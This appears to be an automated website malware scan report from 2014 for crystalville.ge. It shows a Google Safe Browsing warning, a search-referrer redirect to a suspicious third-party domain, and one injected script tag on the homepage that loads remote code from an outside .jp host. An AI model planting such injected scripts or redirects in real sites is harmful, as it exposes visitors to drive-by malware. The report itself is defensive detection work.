Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=crystalville.ge
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.crystalville.ge/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.crystalville.ge Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 02 Apr 2014 04:27:02 GMT Location: http://zgaveata.dreamingofnewyork.com/s?feature=plcp&len=402&cfps=0&screenw=1280&vtmp=1&plid=AATExC4BVZxFDns-&art=4.859&playerw=640&ad_flags=0&playerh=390&mt=0&slots=sst~0;sidx~0;at~2_3&scoville=1&volume=100&nbe=2&nsiabblmax=75281.000&h=360&screenh=720&ad_event=3&nsiabblmin=630.000&cid=18&nsiabblmean=35001.209&mos=0&nsiabblc=316&referrer=http%3A%2F%2Fwww.crystalville.ge%2F&sidx=0&pd=26.897&rt=283.371&nsivbblmax=640197.000&fs=0&sst=0&w=634&nsivbblmin=5988.000&et=69.73&lact=70177&vid=tyyZmhZQhpi1re4lfPAwnGOgRj3x4qRnC&st=56.8&allowed=1_2,1_1,1_3,2_1,2_2_2,2_2,2_3&vw=634&rendering=software&vh=360&nsidf=8&nsivbblmean=313858.445&nsivbblc=317&fexp=920704,912706,921602,919804,913542,907335,922600,903114,924700,906510,906831,907344,907217,919306,920706,919316,902518,919324,924402,924500,915101&tsphab=1&bc=8770891&el=detailpage&sdetail=f:plcp%2Cp:/show/topgear/videos&ns=yt&hbt=124.693&tspfdt=3109&decoding=software&tspne=0&ptk=bbcworldwide&sourceid=y&hbd=4269928&sd=BADC23161MH1342246781109542&fmt=34&docid=5KiC03_wVjc&vq=auto&md=1&sendtmp=1&at=2_3&csipt=watch5ad&hasstoryboard=1&bd=1494896&bt=39.930&tpmt=68&cr=ID&hl=en_US Server: Apache Content-Length: 1590 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: WNy=02; path=/; domain=www.crystalville.ge; expires=Tue, 08-Apr-2014 11:27:02 GMT | suspicious |
URL: http://zgaveata.dreamingofnewyork.com/s?feature=plcp&len=402&cfps=0&screenw=1280&vtmp=1&plid=AATExC4BVZxFDns-&art=4.859&playerw=640&ad_flags=0&playerh=390&mt=0&slots=sst~0;sidx~0;at~2_3&scoville=1&volume=100&nbe=2&nsiabblmax=75281.000&h=360&screenh=720&ad_event=3&nsiabblmin=630.000&cid=18&nsiabblmean=35001.209&mos=0&nsiabblc=316&referrer=http%3A%2F%2Fwww.crystalville.ge%2F&sidx=0&pd=26.897&rt=283.371&nsivbblmax=640197.000&fs=0&sst=0&w=634&nsivbblmin=5988.000&et=69.73&lact=70177&vid=tyyZmhZQhpi1re4lfPAwnGOgRj3x4qRnC&st=56.8&allowed=1_2,1_1,1_3,2_1,2_2_2,2_2,2_3&vw=634&rendering=software&vh=360&nsidf=8&nsivbblmean=313858.445&nsivbblc=317&fexp=920704,912706,921602,919804,913542,907335,922600,903114,924700,906510,906831,907344,907217,919306,920706,919316,902518,919324,924402,924500,915101&tsphab=1&bc=8770891&el=detailpage&sdetail=f:plcp%2Cp:/show/topgear/videos&ns=yt&hbt=124.693&tspfdt=3109&decoding=software&tspne=0&ptk=bbcworldwide&sourceid=y&hbd=4269928&sd=BADC23161MH1342246781109542&fmt=34&docid=5KiC03_wVjc&vq=auto&md=1&sendtmp=1&at=2_3&csipt=watch5ad&hasstoryboard=1&bd=1494896&bt=39.930&tpmt=68&cr=ID&hl=en_US (imitation of visitor from search engine) GET /s?feature=plcp&len=402&cfps=0&screenw=1280&vtmp=1&plid=AATExC4BVZxFDns-&art=4.859&playerw=640&ad_flags=0&playerh=390&mt=0&slots=sst~0;sidx~0;at~2_3&scoville=1&volume=100&nbe=2&nsiabblmax=75281.000&h=360&screenh=720&ad_event=3&nsiabblmin=630.000&cid=18&nsiabblmean=35001.209&mos=0&nsiabblc=316&referrer=http%3A%2F%2Fwww.crystalville.ge%2F&sidx=0&pd=26.897&rt=283.371&nsivbblmax=640197.000&fs=0&sst=0&w=634&nsivbblmin=5988.000&et=69.73&lact=70177&vid=tyyZmhZQhpi1re4lfPAwnGOgRj3x4qRnC&st=56.8&allowed=1_2,1_1,1_3,2_1,2_2_2,2_2,2_3&vw=634&rendering=software&vh=360&nsidf=8&nsivbblmean=313858.445&nsivbblc=317&fexp=920704,912706,921602,919804,913542,907335,922600,903114,924700,906510,906831,907344,907217,919306,920706,919316,902518,919324,924402,924500,915101&tsphab=1&bc=8770891&el=detailpage&sdetail=f:plcp%2Cp:/show/topgear/videos&ns=yt&hbt=124.693&tspfdt=3109&decoding=software&tspne=0&ptk=bbcworldwide&sourceid=y&hbd=4269928&sd=BADC23161MH1342246781109542&fmt=34&docid=5KiC03_wVjc&vq=auto&md=1&sendtmp=1&at=2_3&csipt=watch5ad&hasstoryboard=1&bd=1494896&bt=39.930&tpmt=68&cr=ID&hl=en_US HTTP/1.1 Host: zgaveata.dreamingofnewyork.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 02 Apr 2014 04:27:05 GMT Location: http://www.google.com/ Server: nginx/1.1.4 Content-Length: 160 Content-Type: text/html | suspicious |
Scanned pages/files
Request | Server response | Status |
http://www.crystalville.ge/ | 200 OK Content-Length: 3482 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.5wari1bu.jp/qPdYbw6H.php?id=$frameid"></script> | ||
http://www.crystalville.ge/site/content/scripts/swfobject.js | 200 OK Content-Length: 6758 Content-Type: application/javascript | clean |
http://www.crystalville.ge/site/content/scripts/popups.js | 200 OK Content-Length: 623 Content-Type: application/javascript | clean |
http://www.crystalville.ge/site/content/scripts/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://www.crystalville.ge/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |